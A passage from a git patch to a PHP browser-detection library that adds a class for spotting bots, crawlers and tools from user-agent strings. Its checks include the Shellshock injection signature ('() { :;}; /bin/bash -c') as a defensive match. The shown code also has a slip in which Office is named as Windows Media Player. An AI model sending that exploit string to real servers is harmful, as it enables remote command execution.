From 05958ebfb89ab2cb2cc0b4f3690d1d7e393d1ea6 Mon Sep 17 00:00:00 2001 From: Tom Mettam Date: Fri, 31 Mar 2017 17:07:52 +0100 Subject: [PATCH 01/19] !! BREAKING CHANGES !! * Removed $isRobot, setIsRobot(), getIsRobot(), isRobot(), checkBrowserRobot() * Replaced above with detectScriptedAgent() * Added a new ScriptedAgent class with detection for bots, spiders, etc * Added isWebkit(), getIsWebkit(), setIsWebkit() NOTE: TODO: Should add proper browser engine detection (Webkit, Gecko, Trident, etc) * Added $isTwitterWebView, setIsTwitterWebView(), getIsTwitterWebView(), isTwitterWebView(); * Added browser detection for UC Browser * Added browser detection for NSPlayer (Windows Media Player) * Added OS detection for NSPlayer (Windows Media Player) * Added browser detection for Microsoft Office * Added browser detection for the Apple News app * Added browser detection for the Dalvik (Android) OS * Moved wkHTMLtoPDF to scripted agents and removed the test accordingly * Moved GoogleBot to scripted agents * Moved Slurp to scripted agents * Moved W3CValidator to scripted agents * Moved MSNBot to scripted agents * Renamed "Navigator" to "Android Navigator" for clarity * Strip linebreaks in setVersion (fixes a failng test) * Added .idea to the gitignore (I use PHPstorm, don't be a hater) TODO: Tests for new class --- .gitignore | 1 + README.md | 99 ++- src/Browser.php | 152 +++- src/BrowserDetector.php | 182 +++- src/OsDetector.php | 5 + src/ScriptedAgent.php | 193 +++++ src/ScriptedAgentDetector.php | 800 ++++++++++++++++++ .../Tests/_files/UserAgentStrings.xml | 11 - 8 files changed, 1360 insertions(+), 83 deletions(-) create mode 100644 src/ScriptedAgent.php create mode 100644 src/ScriptedAgentDetector.php diff --git a/.gitignore b/.gitignore index 81b9258..86d9b11 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,4 @@ composer.lock phpunit.xml vendor +.idea \ No newline at end of file diff --git a/README.md b/README.md index cee8a05..92e5ef5 100644 --- a/README.md +++ b/README.md @@ -51,16 +51,13 @@ The Browser class allows you to detect a user's browser and version. * Lynx * Safari * Chrome - * Navigator - * GoogleBot - * Yahoo! Slurp - * W3C Validator + * Android Navigator + * UC Browser * BlackBerry * IceCat * Nokia S60 OSS Browser * Nokia Browser * MSN Browser - * MSN Bot * Netscape Navigator * Galeon * NetPositive @@ -69,14 +66,16 @@ The Browser class allows you to detect a user's browser and version. * Yandex Browser * Comodo Dragon * Samsung Browser - * wkhtmltopdf ### Usage ```php use Sinergi\BrowserDetector\Browser; -$browser = new Browser(); +$browser = new Browser(); + +//You can also provide a userAgent string if you don't wish to detec the current browser +//$browser = new Browser("Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0"); if ($browser->getName() === Browser::IE && $browser->getVersion() < 11) { echo 'Please upgrade your browser.'; @@ -97,6 +96,92 @@ if ($browser->getName() === Browser::IE && $browser->isCompatibilityMode()) { } ``` +## Scripted Agent Detection + +The ScriptedAgent class allows you to detect scripted agents (bots, spiders, tools) + +### Scripted Agents Detected + +Spiders + + * GoogleBot + * Baidu + * Bing + * MSN + * Yahoo! Slurp + * W3C Spiders + * Yandex + * Apple + * Paper.li + * Majestic12 + * Livelap + * Scoop.it + * Who.is + * Proximic + +Web Surveys + + * Ahrefs + * MetaURI + * Netcraft + * Browsershots + * MageReport + * SocialRank.io + * Gluten Free + * Ubermetrics + * Verisign IPS-Agent + +Exploits + + * ShellShock + +Web Preview bots + + * ICQ + * Google Web + * Facebook + * Bing + * Twitter + * Skype + +Tools + + * wkHTMLtoPDF + * W3C Validator + * WebDAV + * TLSProbe + * Wget + * Zgrab + +Generic + + * Google Favicon + * Curl + * Python + * GoLang + * Perl + * Java + +Ad bots + + * Google + * Microsoft + * AdBeat + +### Usage + +```php +use Sinergi\BrowserDetector\Browser; + +$browser = new Browser(); + +$scriptedAgent = $browser->detectScriptedAgent(); +if ($scriptedAgent!==false) +{ + die("Detected ".$scriptedAgent->getName()." which is a ".$scriptedAgent->getType().". Info: ".$scriptedAgent->getInfoURL()); +} +``` + ## OS Detection The OS class allows you to detect a user's operating system and version. diff --git a/src/Browser.php b/src/Browser.php index 2e34aca..52b0f44 100644 --- a/src/Browser.php +++ b/src/Browser.php @@ -25,20 +25,15 @@ class Browser const MOZILLA = 'Mozilla'; const AMAYA = 'Amaya'; const LYNX = 'Lynx'; - const WKHTMLTOPDF = 'wkhtmltopdf'; const SAFARI = 'Safari'; const SAMSUNG_BROWSER = 'SamsungBrowser'; const CHROME = 'Chrome'; - const NAVIGATOR = 'Navigator'; - const GOOGLEBOT = 'GoogleBot'; - const SLURP = 'Yahoo! Slurp'; - const W3CVALIDATOR = 'W3C Validator'; + const NAVIGATOR = 'Android Navigator'; const BLACKBERRY = 'BlackBerry'; const ICECAT = 'IceCat'; const NOKIA_S60 = 'Nokia S60 OSS Browser'; const NOKIA = 'Nokia Browser'; const MSN = 'MSN Browser'; - const MSNBOT = 'MSN Bot'; const NETSCAPE_NAVIGATOR = 'Netscape Navigator'; const GALEON = 'Galeon'; const NETPOSITIVE = 'NetPositive'; @@ -47,6 +42,11 @@ class Browser const YANDEX = 'Yandex'; const EDGE = 'Edge'; const DRAGON = 'Dragon'; + const NSPLAYER = 'Windows Media Player'; + const UCBROWSER = 'UC Browser'; + const MICROSOFT_OFFICE = 'Microsoft Office'; + const APPLE_NEWS = 'Apple News'; + const DALVIK = 'Android'; const VERSION_UNKNOWN = 'unknown'; @@ -67,18 +67,23 @@ class Browser /** * @var bool */ - private $isRobot = false; + private $isChromeFrame = false; /** * @var bool */ - private $isChromeFrame = false; + private $isWebkit = false; /** * @var bool */ private $isFacebookWebView = false; + /** + * @var bool + */ + private $isTwitterWebView = false; + /** * @var bool */ @@ -101,7 +106,7 @@ public function __construct($userAgent = null) } /** - * Set the name of the OS. + * Set the name of the Browser. * * @param string $name * @@ -149,7 +154,8 @@ public function isBrowser($name) */ public function setVersion($version) { - $this->version = (string)$version; + //The regex for the Firefox version lets through a linebreak, causing the test to fail + $this->version = str_replace("\n","",(string)$version); return $this; } @@ -169,39 +175,101 @@ public function getVersion() } /** - * Set the Browser to be a robot. + * Detects scripted agents (robots / bots) + * Returns a resolved ScriptedAgent object if detected. + * Otherwise returns false. * - * @param bool $isRobot + * @return ScriptedAgent|bool + */ + public function detectScriptedAgent() + { + $ua = $this->getUserAgent()->getUserAgentString(); + if (stripos($ua, 'bot') !== FALSE || + stripos($ua, 'spider') !== FALSE || + stripos($ua, 'crawler') !== FALSE || + stripos($ua, 'preview') !== FALSE || + stripos($ua, 'slurp') !== FALSE || + stripos($ua, 'facebookexternalhit') !== FALSE || + stripos($ua, 'mediapartners') !== FALSE || + stripos($ua, 'google-adwords') !== FALSE || + stripos($ua, 'adxvastfetcher') !== FALSE || + stripos($ua, 'adbeat') !== FALSE || + stripos($ua, 'google favicon') !== FALSE || + stripos($ua, 'webdav client') !== FALSE || + stripos($ua, 'metauri api') !== FALSE || + stripos($ua, 'tlsprobe') !== FALSE || + stripos($ua, 'wpif') !== FALSE || + stripos($ua, 'imgsizer') !== FALSE || + stripos($ua, 'netcraft ssl server survey') !== FALSE || + stripos($ua, 'curl/') !== FALSE || + stripos($ua, 'go-http-client/') !== FALSE || + stripos($ua, 'python') !== FALSE || + stripos($ua, 'libwww') !== FALSE || + stripos($ua, 'wget/') !== FALSE || + stripos($ua, 'zgrab/') !== FALSE || + stripos($ua, 'Java/') !== FALSE || + stripos($ua, '() { :;}; /bin/bash -c') !== FALSE || + stripos($ua, 'browsershots') !== FALSE || + stripos($ua, 'magereport') !== FALSE || + stripos($ua, 'ubermetrics-technologies') !== FALSE || + stripos($ua, 'W3C') !== FALSE || + stripos($ua, 'Validator') !== FALSE || + stripos($ua, 'Jigsaw/') !== FALSE || + stripos($ua, 'bing') !== FALSE || + stripos($ua, 'msn') !== FALSE || + stripos($ua, 'Google Web Preview') !== FALSE || + stripos($ua, 'ips-agent') !== FALSE || + (stripos($ua, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) //ICQ Preview + ) + { + $scriptedAgent = new ScriptedAgent($ua); + if ($scriptedAgent->getName()==ScriptedAgent::UNKNOWN) + { + return false; + } + else + { + return $scriptedAgent; + } + } + else + { + return false; + } + } + + /** + * @param bool $isChromeFrame * * @return $this */ - public function setIsRobot($isRobot) + public function setIsChromeFrame($isChromeFrame) { - $this->isRobot = (bool)$isRobot; + $this->isChromeFrame = (bool)$isChromeFrame; return $this; } /** - * Is the browser from a robot (ex Slurp,GoogleBot)? + * Used to determine if the browser is actually "chromeframe". * * @return bool */ - public function getIsRobot() + public function getIsChromeFrame() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isRobot; + return $this->isChromeFrame; } /** * @return bool */ - public function isRobot() + public function isChromeFrame() { - return $this->getIsRobot(); + return $this->getIsChromeFrame(); } /** @@ -209,9 +277,9 @@ public function isRobot() * * @return $this */ - public function setIsChromeFrame($isChromeFrame) + public function setIsWebkit($isWebkit) { - $this->isChromeFrame = (bool)$isChromeFrame; + $this->isWebkit = (bool)$isWebkit; return $this; } @@ -221,21 +289,21 @@ public function setIsChromeFrame($isChromeFrame) * * @return bool */ - public function getIsChromeFrame() + public function getIsWebkit() { if (!isset($this->name)) { BrowserDetector::detect($this, $this->getUserAgent()); } - return $this->isChromeFrame; + return $this->isWebkit; } /** * @return bool */ - public function isChromeFrame() + public function isWebkit() { - return $this->getIsChromeFrame(); + return $this->getIsWebkit(); } /** @@ -272,6 +340,40 @@ public function isFacebookWebView() return $this->getIsFacebookWebView(); } + /** + * @param bool $isTwitterWebView + * + * @return $this + */ + public function setIsTwitterWebView($isTwitterWebView) + { + $this->isTwitterWebView = (bool) $isTwitterWebView; + + return $this; + } + + /** + * Used to determine if the browser is actually "Twitter". + * + * @return bool + */ + public function getIsTwitterWebView() + { + if (!isset($this->name)) { + BrowserDetector::detect($this, $this->getUserAgent()); + } + + return $this->isTwitterWebView; + } + + /** + * @return bool + */ + public function isTwitterWebView() + { + return $this->getIsTwitterWebView(); + } + /** * @param UserAgent $userAgent * diff --git a/src/BrowserDetector.php b/src/BrowserDetector.php index 5156188..d18be6f 100644 --- a/src/BrowserDetector.php +++ b/src/BrowserDetector.php @@ -46,16 +46,14 @@ class BrowserDetector implements DetectorInterface 'Samsung', 'Chrome', 'OmniWeb', + 'UCBrowser', //before Android // common mobile 'Android', 'BlackBerry', 'Nokia', 'Gsa', - // common bots - 'Robot', - // wkhtmltopdf before Safari - 'Wkhtmltopdf', // WebKit base check (post mobile and others) + 'AppleNews', 'Safari', // everyone else 'NetPositive', @@ -65,6 +63,8 @@ class BrowserDetector implements DetectorInterface 'Phoenix', 'Amaya', 'Lynx', + 'NSPlayer', + 'Office', 'Shiretoko', 'IceCat', 'Iceweasel', @@ -92,6 +92,8 @@ public static function detect(Browser $browser, UserAgent $userAgent = null) self::checkChromeFrame(); self::checkFacebookWebView(); + self::checkTwitterWebView(); + self::checkWebkit(); foreach (self::$browsersList as $browserName) { $funcName = self::FUNC_PREFIX . $browserName; @@ -120,6 +122,22 @@ public static function checkChromeFrame() return false; } + /** + * Determine if the browser is a wekit webview. + * + * @return bool + */ + public static function checkWebkit() + { + if (strpos(self::$userAgentString, 'AppleWebKit/') !== false) { + self::$browser->setIsWebkit(true); + + return true; + } + + return false; + } + /** * Determine if the user is using Facebook. * @@ -136,6 +154,24 @@ public static function checkFacebookWebView() return false; } + /** + * Determine if the user is using Twitter. + * + * @return bool + */ + public static function checkTwitterWebView() + { + if (strpos(self::$userAgentString, 'Twitter for') !== false) { + self::$browser->setIsTwitterWebView(true); + + return true; + } + + return false; + } + + + /** * Determine if the user is using a BlackBerry. * @@ -173,25 +209,6 @@ public static function checkBrowserBlackBerry() return false; } - /** - * Determine if the browser is a robot. - * - * @return bool - */ - public static function checkBrowserRobot() - { - if (stripos(self::$userAgentString, 'bot') !== false || - stripos(self::$userAgentString, 'spider') !== false || - stripos(self::$userAgentString, 'crawler') !== false - ) { - self::$browser->setIsRobot(true); - - return true; - } - - return false; - } - /** * Determine if the browser is Internet Explorer. * @@ -731,7 +748,7 @@ public static function checkBrowserIceCat() */ public static function checkBrowserNokia() { - if (preg_match("/Nokia([^\/]+)\/([^ SP]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Nokia([^\\/]+)\\/([^ SP]+)/i", self::$userAgentString, $matches)) { self::$browser->setVersion($matches[2]); if (stripos(self::$userAgentString, 'Series60') !== false || strpos(self::$userAgentString, 'S60') !== false @@ -755,7 +772,7 @@ public static function checkBrowserNokia() public static function checkBrowserFirefox() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/Firefox[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/Firefox[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -781,7 +798,7 @@ public static function checkBrowserFirefox() public static function checkBrowserSeaMonkey() { if (stripos(self::$userAgentString, 'safari') === false) { - if (preg_match("/SeaMonkey[\/ \(]([^ ;\)]+)/i", self::$userAgentString, $matches)) { + if (preg_match("/SeaMonkey[\\/ \\(]([^ ;\\)]+)/i", self::$userAgentString, $matches)) { if (isset($matches[1])) { self::$browser->setVersion($matches[1]); } @@ -901,20 +918,7 @@ public static function checkBrowserAmaya() return false; } - /** - * Determine if the browser is Safari. - * - * @return bool - */ - public static function checkBrowserWkhtmltopdf() - { - if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { - self::$browser->setName(Browser::WKHTMLTOPDF); - return true; - } - return false; - } /** * Determine if the browser is Safari. * @@ -987,7 +991,7 @@ public static function checkBrowserDragon() */ public static function checkBrowserAndroid() { - // Navigator + // Android Navigator if (stripos(self::$userAgentString, 'Android') !== false) { if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { if (isset($matches[1])) { @@ -1001,6 +1005,104 @@ public static function checkBrowserAndroid() return true; } + // Dalvik (Android OS) + if (stripos(self::$userAgentString, 'Dalvik/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'Dalvik')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::DALVIK); + + return true; + } + + return false; + } + + /** + * Determine if the browser is UCBrowser. + * + * @return bool + */ + public static function checkBrowserUCBrowser() + { + // Navigator + if (stripos(self::$userAgentString, 'UCBrowser/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'UCBrowser')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::UCBROWSER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Windows Media Player. + * + * @return bool + */ + public static function checkBrowserNSPlayer() + { + // Navigator + if (stripos(self::$userAgentString, 'NSPlayer/') !== false) { + $aresult = explode('/', stristr(self::$userAgentString, 'NSPlayer')); + if (isset($aresult[1])) { + $aversion = explode(' ', $aresult[1]); + self::$browser->setVersion($aversion[0]); + } + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is Microsoft Office. + * + * @return bool + */ + public static function checkBrowserOffice() + { + // Navigator + if (stripos(self::$userAgentString, 'Microsoft Office') !== false) { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + self::$browser->setName(Browser::NSPLAYER); + + return true; + } + + return false; + } + + /** + * Determine if the browser is the Apple News app. + * + * @return bool + */ + public static function checkBrowserAppleNews() + { + // Navigator + if (stripos(self::$userAgentString, 'AppleNews/') !== false) { + if (preg_match('/Version\/([\d\.]*)/i', self::$userAgentString, $matches)) { + if (isset($matches[1])) { + self::$browser->setVersion($matches[1]); + } + } else { + self::$browser->setVersion(Browser::VERSION_UNKNOWN); + } + self::$browser->setName(Browser::APPLE_NEWS); + + return true; + } + return false; } } diff --git a/src/OsDetector.php b/src/OsDetector.php index 40b0611..8510e90 100644 --- a/src/OsDetector.php +++ b/src/OsDetector.php @@ -209,6 +209,11 @@ private static function checkWindows(Os $os, UserAgent $userAgent) return true; } + if (stripos($userAgent->getUserAgentString(), 'NSPlayer/') !== false) { + $os->setName(Os::WINDOWS); + $os->setVersion(Os::VERSION_UNKNOWN); + return true; + } return false; } diff --git a/src/ScriptedAgent.php b/src/ScriptedAgent.php new file mode 100644 index 0000000..826a146 --- /dev/null +++ b/src/ScriptedAgent.php @@ -0,0 +1,193 @@ +setUserAgent($userAgent); + } elseif (null === $userAgent || is_string($userAgent)) { + $this->setUserAgent(new UserAgent($userAgent)); + } else { + throw new InvalidArgumentException(); + } + } + + /** + * Set the name of the ScriptedAgent. + * + * @param string $name + * + * @return void + */ + public function setName($name) + { + $this->name = (string)$name; + } + + /** + * Return the name of the ScriptedAgent. + * + * @return string + */ + public function getName() + { + if (!isset($this->name)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->name; + } + + /** + * Set the type of the ScriptedAgent. + * + * @param string $type + * + * @return void + */ + public function setType($type) + { + $this->type = (string)$type; + } + + /** + * Return the type of the ScriptedAgent. + * + * @return string + */ + public function getType() + { + if (!isset($this->type)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + + return $this->type; + } + + /** + * Set the info URL for the ScriptedAgent. + * + * @param string $url + * + * @return void + */ + public function setInfoURL($url) + { + $this->url = (string)$url; + } + + /** + * Return the info URL for the ScriptedAgent. + * + * @return string + */ + public function getInfoURL() + { + if (!isset($this->url)) { + ScriptedAgentDetector::detect($this, $this->getUserAgent()); + } + return $this->url; + } + + /** + * @param UserAgent $userAgent + * + * @return void + */ + public function setUserAgent(UserAgent $userAgent) + { + $this->userAgent = $userAgent; + } + + /** + * @return UserAgent + */ + public function getUserAgent() + { + return $this->userAgent; + } + + +} + + +?> \ No newline at end of file diff --git a/src/ScriptedAgentDetector.php b/src/ScriptedAgentDetector.php new file mode 100644 index 0000000..c51cf84 --- /dev/null +++ b/src/ScriptedAgentDetector.php @@ -0,0 +1,800 @@ +getUserAgent(); + } + self::$userAgentString = $userAgent->getUserAgentString(); + + self::$scriptedAgent->setName(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setType(ScriptedAgent::UNKNOWN); + self::$scriptedAgent->setInfoURL(ScriptedAgent::UNKNOWN); + + foreach (self::$robotsList as $robotName) { + $funcName = self::FUNC_PREFIX . $robotName; + + if (self::$funcName()) { + return true; + } + } + + return false; + } + + /** + * Determine if the browser is wkHTMLtoPDF + * + * @return bool + */ + public static function checkRobotwkHTMLtoPDF() + { + if (stripos(self::$userAgentString, 'wkhtmltopdf') !== false) { + self::$scriptedAgent->setName(ScriptedAgent::WKHTMLTOPDF); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://wkhtmltopdf.org/"); + return true; + } + return false; + } + + /** + * Determine if the browser is the ICQ preview. + * + * @return bool + */ + public static function checkRobotICQ() + { + //Chrome 51 always provides the Upgrade-Insecure-Requests header. ICQ does not. + //But to be extra safe, also check for the russian language which the ICQ bot sets. + if (stripos(self::$userAgentString, 'Chrome/51.0.2704.103') !== FALSE && !isset($_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']) && stristr($_SERVER['HTTP_ACCEPT_LANGUAGE'], "ru-RU") !== FALSE) + { + self::$scriptedAgent->setName(ScriptedAgent::ICQ); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://icq.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is GoogleBot, or a google ads bot. + * + * @return bool + */ + public static function checkRobotGoogle() + { + if (stripos(self::$userAgentString, "Googlebot") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "AdsBot-Google") !== false + || stripos(self::$userAgentString, "Mediapartners-Google") !== false + || stripos(self::$userAgentString, "Google-Adwords") !== false + || stripos(self::$userAgentString, "AdXVastFetcher-Google") !== false + ) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEADS); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + if (stripos(self::$userAgentString, "Google Favicon") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEFAVICON); + self::$scriptedAgent->setType(ScriptedAgent::GENERIC); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4626518.htm"); + return true; + } + if (stripos(self::$userAgentString, "Google Web Preview") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::GOOGLEPREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.distilnetworks.com/bot-directory/bot/google-web-preview/"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Baidu spider. + * + * @return bool + */ + public static function checkRobotBaidu() + { + if (stripos(self::$userAgentString, "Baiduspider") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BAIDU); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.google.com/webmasters/answer/1061943?hl=en"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Facebook preview bot. + * + * @return bool + */ + public static function checkRobotFacebook() + { + if (stripos(self::$userAgentString, "facebookexternalhit") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::FACEBOOK); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.facebook.com/externalhit_uatext.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the bing spider, bing preview bot, or MSN bot + * + * @return bool + */ + public static function checkRobotBing() + { + + if (stripos(self::$userAgentString, "adidxbot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::ADVERTISING); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/bingbot.htm") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "/msnbot.htm") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MSNBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + if (stripos(self::$userAgentString, "BingPreview/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::BING_PREVIEW); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("https://www.bing.com/webmaster/help/which-crawlers-does-bing-use-8c184ec0"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yahoo Slurp! Spider. + * + * @return bool + * + */ + public static function checkRobotSlurp() + { + if (stripos(self::$userAgentString, "Yahoo! Slurp") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SLURP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://help.yahoo.com/kb/SLN22600.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is the twitter preview bot. + * + * @return bool + */ + public static function checkRobotTwitter() + { + if (stripos(self::$userAgentString, "Twitterbot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::TWITTER); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://stackoverflow.com/questions/22362215/twitter-user-agent-on-sharing"); + return true; + } + return false; + } + + /** + * Determine if the agent is the skype preview bot. + * + * @return bool + */ + public static function checkRobotSkype() + { + if (stripos(self::$userAgentString, "SkypeUriPreview") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SKYPE); + self::$scriptedAgent->setType(ScriptedAgent::PREVIEW); + self::$scriptedAgent->setInfoURL("http://www.skype.com"); + return true; + } + return false; + } + + /** + * Determine if the agent is the W3C Validator tool. + * + * @return bool + */ + public static function checkRobotW3CValidator() + { + if (stripos(self::$userAgentString, "W3C_Validator/") !== false || + stripos(self::$userAgentString, "Validator.nu/") !== false || + stripos(self::$userAgentString, "W3C-mobileOK/DDC-") !== false || + stripos(self::$userAgentString, "W3C_I18n-Checker/") !== false || + stripos(self::$userAgentString, "FeedValidator/") !== false || + stripos(self::$userAgentString, "Jigsaw/") !== false || + stripos(self::$userAgentString, "JW3C_Unicorn/") !== false + ) + { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + if (stripos(self::$userAgentString, "NING/") !== false || + stripos(self::$userAgentString, "W3C-checklink") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::W3CVALIDATOR); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://validator.w3.org/services"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Yandex spider. + * + * @return bool + */ + public static function checkRobotYandex() + { + if (stripos(self::$userAgentString, "YandexBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::YANDEX); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://yandex.com/bots"); + return true; + } + return false; + } + + /** + * Determine if the agent is the AppleBot + * + * @return bool + */ + public static function checkRobotApple() + { + if (stripos(self::$userAgentString, "AppleBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::APPLEBOT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.apple.com/en-gb/HT204683"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Paper.li bot. + * + * @return bool + */ + public static function checkRobotPaperli() + { + if (stripos(self::$userAgentString, "PaperLiBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::PAPERLI); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://support.paper.li/hc/en-us/articles/204105253-What-is-Paper-li-"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Ahrefs survey. + * + * @return bool + */ + public static function checkRobotAhrefs() + { + if (stripos(self::$userAgentString, "AhrefsBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::AHREFS); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://ahrefs.com/robot"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Majestic 12 spider. + * + * @return bool + */ + public static function checkRobotMJ12() + { + if (stripos(self::$userAgentString, "MJ12Bot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::MJ12); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://www.majestic12.co.uk/projects/dsearch/mj12bot.php"); + return true; + } + return false; + } + + /** + * Determine if the agent is the LiveLap spider. + * + * @return bool + */ + public static function checkRobotLiveLap() + { + if (stripos(self::$userAgentString, "LivelapBot/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::LIVELAP); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("http://site.livelap.com/crawler.html"); + return true; + } + return false; + } + + /** + * Determine if the agent is a Web Distributed Authoring and Versioning client. Usually unexpected WebDAV requests are hack attempts. + * + * @return bool + */ + public static function checkRobotWebdav() + { + if (stripos(self::$userAgentString, "WEBDAV Client") !== false || + stripos(self::$userAgentString, "Microsoft Office Existence Discovery") !== false) //Office Webdav probe + { + self::$scriptedAgent->setName(ScriptedAgent::WEBDAV); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://en.wikipedia.org/wiki/WebDAV"); + return true; + } + return false; + } + + /** + * Determine if the agent is the MetaURI scraper. + * + * @return bool + */ + public static function checkRobotMetaURI() + { + if (stripos(self::$userAgentString, "MetaURI API/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::METAURI); + self::$scriptedAgent->setType(ScriptedAgent::SURVEY); + self::$scriptedAgent->setInfoURL("https://github.com/stateless-systems/uri-meta"); + return true; + } + return false; + } + + /** + * Determine if the agent is the TLSProbe tool. + * + * @return bool + */ + public static function checkRobotTLSProbe() + { + if (stripos(self::$userAgentString, "TLSProbe/") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::TLSPROBE); + self::$scriptedAgent->setType(ScriptedAgent::TOOL); + self::$scriptedAgent->setInfoURL("https://bitbucket.org/marco-bellaccini/tlsprobe"); + return true; + } + return false; + } + + /** + * Determine if the agent is the scoop.it bots. + * + * @return bool + */ + public static function checkRobotScoopIt() + { + if (stripos(self::$userAgentString, "wpif Safari") !== false + || stripos(self::$userAgentString, "imgsizer Safari") !== false) + { + self::$scriptedAgent->setName(ScriptedAgent::SCOOPIT); + self::$scriptedAgent->setType(ScriptedAgent::SPIDER); + self::$scriptedAgent->setInfoURL("https://www.webmasterworld.com/search_engine_spiders/4785385.htm"); + return true; + } + return false; + } + + /** + * Determine if the agent is the Netcraft SSL Survey. + * + * @return bool + */ + public static function checkRobotNetcraft() + { + if 